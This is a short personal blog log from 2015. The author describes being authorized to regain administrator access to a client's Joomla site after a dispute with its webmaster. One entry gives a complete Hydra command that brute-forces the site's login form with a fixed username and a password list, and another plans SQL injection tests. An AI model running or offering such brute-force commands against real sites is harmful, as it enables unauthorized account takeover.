Nothing fancy, just a personal log with a built-in search function so I can recall what is easily forgotten.
Monday, August 17, 2015
Authorized Brute Force Password Attack from 104.175.53.76
Since I have been authorized to pentest Design-atelier-antiques, I installed and ran Hydra on Ubuntu Linux. Below is an example of what I typed into the command line window.
hydra -l adminv01 -P pwlist3.txt -s 80 -f www.designer-atelier-antiques.com http-post-form "antiques/administrator/index.php?page=login.php:usrname=^USER^&pass=^PASS^&login-php-submit-button=Login:Incorrect Username"
Sunday, August 9, 2015
Shady Blackmailing Web Master
The creator of Design-Atelier-Antiques is claiming that the stakeholder owes for domain renewal payments that he has been making on their behalf. The stakeholder claims that this web master cost them $4000.00. I was astonished by this amount but even more so by the web master withholding Joomla administration access. A scan of this URL should reveal the web master's name.
Meanwhile, I've continued to explore ways of regaining control via the following:
Tuesday, August 4, 2015
Permission to Hack a Site
With the disappearance of the original webmaster and having received permission to hack my client's site, I spidered the URL with Screaming Frog's SEO Spider. After reviewing the results, I determined that the Joomla site had its administrator page here. Now the fun begins with guessing the password, testing for SQL injection and brute forcing a login. Stay tuned.
